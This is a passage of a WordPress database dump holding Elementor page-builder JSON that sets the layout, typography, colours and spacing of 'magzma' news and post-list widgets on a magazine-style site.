00\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1185,434,'_elementor_version','0.4'),(1187,435,'_elementor_edit_mode','builder'),(1188,435,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\